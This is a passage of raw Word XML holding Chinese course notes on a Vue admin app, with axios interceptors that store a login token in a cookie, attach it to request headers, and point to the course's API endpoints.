    <w:p w14:paraId="2D5B9F3F" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Promise.reject(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF8F3CD" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADD6FE" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1D87BE" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>添加响应拦截器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED6A13" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>service.interceptors.response.use(function (response) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B4407" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对响应数据做点什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D944F" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return response.data.data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F9DBF" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  }, function (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A039CC0" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对响应错误做点什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A14F0A" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Promise.reject(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5261EB94" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11976868" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3460B0F8" w14:textId="788D16E0" w:rsidR="00641158" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71DAD4" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E4F4D2" w14:textId="4E71E6A9" w:rsidR="00641158" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为这里响应拦截处理，返回的不再是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>esponse.data.data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接使用响应拦截的返回就行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0890F53C" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31AE3319" w14:textId="28CA8EDB" w:rsidR="00641158" w:rsidRDefault="006E5D70" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应拦截器：</w:t>
      </w:r>
      <w:r w:rsidR="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="0038137E">
        <w:t>ogin.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F799E" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和用户相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493961DD" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396C2F5B" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    const cookie = useCookies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06618842" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>// cookie.set('admin-token', res.data.data.token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB0FD1" w14:textId="66B5096A" w:rsidR="00641158" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    cookie.set('admin-token', res.token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA6E37" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F2EAAF" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B59E455" w14:textId="779866DC" w:rsidR="00AD4E9E" w:rsidRDefault="006E5D70" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求拦截器：</w:t>
      </w:r>
      <w:r w:rsidR="001624A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>让</w:t>
      </w:r>
      <w:r w:rsidR="001624A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidR="001624A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头自动添加</w:t>
      </w:r>
      <w:r w:rsidR="001624A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E04C7D" w14:textId="77777777" w:rsidR="001624A4" w:rsidRDefault="001624A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33ACEB87" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useCookies } from '@vueuse/integrations/useCookies'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD47349" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705777CE" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const service = axios.create({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C1431" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    baseURL: "/api",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF8D78" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA2FD20" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D587DF" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加请求拦截器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA4848" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRPr="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>service.interceptors.request.use(function (config) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343DCEE" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在发送请求之前做些什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F6A15" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C157661" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRPr="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>往</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>头自动添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B3D68" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRPr="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和用户相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F9447" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRPr="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    const cookie = useCookies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8824EF" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRPr="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    const token = cookie.get('admin-token')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDC70F" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRPr="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    if(token){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA59F3" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRPr="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        config.headers['token'] = token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E98E67" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D4F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6808D810" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3655C511" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return config;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1375DC32" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }, function (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D146D" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对请求错误做些什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E555E28" w14:textId="77777777" w:rsidR="00BE3D4F" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return Promise.reject(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299421C" w14:textId="0C0A0617" w:rsidR="00AD4E9E" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C89EC9D" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7246FE9A" w14:textId="2E927DFF" w:rsidR="00AD4E9E" w:rsidRDefault="00BE3D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至此之后，只要有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，向网站发送请求就都会携带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2434C" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FC7D11" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3856F9CD" w14:textId="3352184C" w:rsidR="00AD4E9E" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口：参考网课讲师的官网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9F46D" w14:textId="2340C2A1" w:rsidR="00AD4E9E" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:t>http://dishaxy.dishait.cn/shopadminapi/1.%E7%AE%A1%E7%90%86%E5%91%98%E7%AE%A1%E7%90%86/8.%E8%8E%B7%E5%8F%96%E7%AE%A1%E7%90%86%E5%91%98%E4%BF%A1%E6%81%AF%E5%92%8C%E6%9D%83%E9%99%90%E8%8F%9C%E5%8D%95.html#%E8%8E%B7%E5%8F%96%E7%AE%A1%E7%90%86%E5%91%98%E4%BF%A1%E6%81%AF%E5%92%8C%E6%9D%83%E9%99%90%E8%8F%9C%E5%8D%95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E2FA54" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174632C6" w14:textId="06707AAE" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AA1E64" w14:textId="713E257E" w:rsidR="00AD4E9E" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:t>http://ceshi13.dishait.cn/admin/getinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5CACCF" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645E49CE" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10423E0E" w14:textId="6F541580" w:rsidR="00AD4E9E" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:t>api/manager.js</w:t>
      </w:r>
